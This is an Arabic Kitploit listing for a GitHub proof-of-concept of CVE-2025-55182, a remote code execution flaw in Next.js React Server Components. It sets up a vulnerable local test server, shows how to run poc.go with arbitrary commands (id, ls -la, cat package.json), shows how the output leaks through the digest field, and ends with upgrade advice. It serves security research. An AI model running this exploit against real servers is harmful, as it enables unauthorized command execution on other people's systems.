Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/hoosin/cve-2025-55182
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubhoosin/cve-2025-55182

CVE-2025-55182

عرض المستودع
3منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل إعادة إنتاج CVE-2025-55182 في Next.js RCE

إخلاء مسؤولية

⚠️ هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. يُرجى عدم استخدامها لأغراض غير قانونية. ⚠️

نبذة عن الثغرة

CVE-2025-55182 هي ثغرة خطيرة في تنفيذ الأوامر عن بُعد (RCE) في إطار عمل Next.js. تنبع هذه الثغرة من مشكلة في إلغاء التسلسل غير الآمن (unsafe deserialization) عند معالجة Next.js لطلبات React Server Components (RSC). يمكن للمهاجم تنفيذ تعليمات برمجية عشوائية على الخادم دون تصريح عبر إنشاء طلبات HTTP خبيثة.

الإصدارات المتأثرة:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • بالإضافة إلى بعض إصدارات Canary

إعداد البيئة

يوفر هذا المشروع خادم اختبار Next.js قابلًا للاستغلال باسم test-server.

1. تشغيل خادم الاختبار

تأكد من تثبيت Node.js و npm لديك.

root@kitploit:~
cd test-server
npm install
npm run dev

يعمل الخادم افتراضيًا على http://localhost:3000.

ملاحظة: إذا واجهت خطأ في ملف القفل، يمكنك تجربة:

root@kitploit:~
rm -f .next/dev/lock && npm run dev

إعادة إنتاج الثغرة (POC)

يوفر هذا المشروع سكربت POC مكتوبًا بلغة Go باسم poc.go.

استخدام سكربت Go

الاستخدام:

root@kitploit:~
go run poc.go [URL الهدف] [الأمر المراد تنفيذه]

أمثلة:

  1. تنفيذ أمر id (الافتراضي)

    root@kitploit:~
    go run poc.go
    

    أو

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. عرض ملفات الدليل الحالي

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. عرض محتوى ملف

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

المخرجات المتوقعة: على الرغم من أن رمز حالة HTTP يعيد 500، إلا أن نتيجة تنفيذ الأمر ستُضمَّن في حقل digest داخل الاستجابة.

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

توصيات الإصلاح

قم بترقية Next.js إلى إصدار آمن:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
تنزيل الأداة